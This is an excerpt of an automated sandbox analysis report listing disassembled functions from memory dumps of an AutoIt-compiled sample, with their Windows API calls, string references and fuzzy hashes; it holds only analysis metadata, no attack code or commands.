                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Message
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 2030045667-4017498283
                                        • Opcode ID: 73696782cfe9675eea3c9ef968ffa4c857faf58f7fe11efd6662e2f1770ffb46
                                        • Instruction ID: e58c1efbd57cda039c4b048a19d56a142c79c2010abe8c3e695587af3f8639b2
                                        • Opcode Fuzzy Hash: 73696782cfe9675eea3c9ef968ffa4c857faf58f7fe11efd6662e2f1770ffb46
                                        • Instruction Fuzzy Hash: DEE0D83124830866D21437547C03FD97BC59F05F65F104427F7C8555C38BE224904BE9
                                        Function 00090D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0008F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00090D71,?,?,?,0007100A), ref: 0008F7CE
                                        • IsDebuggerPresent.KERNEL32(?,?,?,0007100A), ref: 00090D75
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0007100A), ref: 00090D84
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00090D7F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 55579361-631824599
                                        • Opcode ID: f1ed0a0d32d812df7def5fee383d8730a16ad6f31804dd0ad81966b3601b2016
                                        • Instruction ID: 56c331dad8eacc11875bc71e0369f59d3033eb8e73c2c084c9a8479dd7fb03cc
                                        • Opcode Fuzzy Hash: f1ed0a0d32d812df7def5fee383d8730a16ad6f31804dd0ad81966b3601b2016
                                        • Instruction Fuzzy Hash: C7E06D742013018FE7709FB8D4083427BE4BB00740F008A2DE8D6C6A92DBF5E4848BD1
                                        Function 000CD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: %.3d$X64
                                        • API String ID: 481472006-1077770165
                                        • Opcode ID: b13d9f240d9b5bc33ccc9c692ebd6f7cc75b78a096c8fbc373071c250d1e35f4
                                        • Instruction ID: 2729155da94a7959912dcffdb030cd678859fa7caaf0960d3d33959167abde7f
                                        • Opcode Fuzzy Hash: b13d9f240d9b5bc33ccc9c692ebd6f7cc75b78a096c8fbc373071c250d1e35f4
                                        • Instruction Fuzzy Hash: B4D062A1C09119E9CB70A7E0DC45EBEB3BCFB29341F508577F94692041D734D5496B61
                                        Function 00102322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0010232C
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0010233F
                                          • Part of subcall function 000DE97B: Sleep.KERNEL32 ref: 000DE9F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 9281283749ff1a0227f262672bef1e0a20e573aa08a62e1427508c0afaf84928
                                        • Instruction ID: 8f07c9016da673ede17fa9724ff93a46ad6ba727457901ce2132e23fabba17ce
                                        • Opcode Fuzzy Hash: 9281283749ff1a0227f262672bef1e0a20e573aa08a62e1427508c0afaf84928
                                        • Instruction Fuzzy Hash: 93D01276395350B7E678B770DC1FFC6BA189B00B14F108A167785AA2D1C9F0A841CEA4
                                        Function 00102356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0010236C
                                        • PostMessageW.USER32(00000000), ref: 00102373
                                          • Part of subcall function 000DE97B: Sleep.KERNEL32 ref: 000DE9F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 564331b9d49b0fa6c45af1408579087598d4aa9f05a93fc169fa057d056f0b7d
                                        • Instruction ID: 3a76c9457b6bcddb83951d071de5900bf0be2cb7be165bb7b3a915b738ca04e0
                                        • Opcode Fuzzy Hash: 564331b9d49b0fa6c45af1408579087598d4aa9f05a93fc169fa057d056f0b7d
                                        • Instruction Fuzzy Hash: A2D0C9763913507AE668B770DC0FFC6B6189B04B14F508A167685AA2D1C9E0A8418EA4
                                        Function 000ABDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 000ABE93
                                        • GetLastError.KERNEL32 ref: 000ABEA1
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000ABEFC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 24370069d718fd2f0cd3afd6a04aed515e51d7c15568342b06ac17e32b1d9e2f
                                        • Instruction ID: c82644ddaf39c06059a29b2cb40ec8d292efd8bbfd94ce6fd40797b1cf16a451
                                        • Opcode Fuzzy Hash: 24370069d718fd2f0cd3afd6a04aed515e51d7c15568342b06ac17e32b1d9e2f
                                        • Instruction Fuzzy Hash: 6E41AF34605246AFCF618FE4CC54AAABBE5AF43320F184269F9599B1A3DB308D01DB60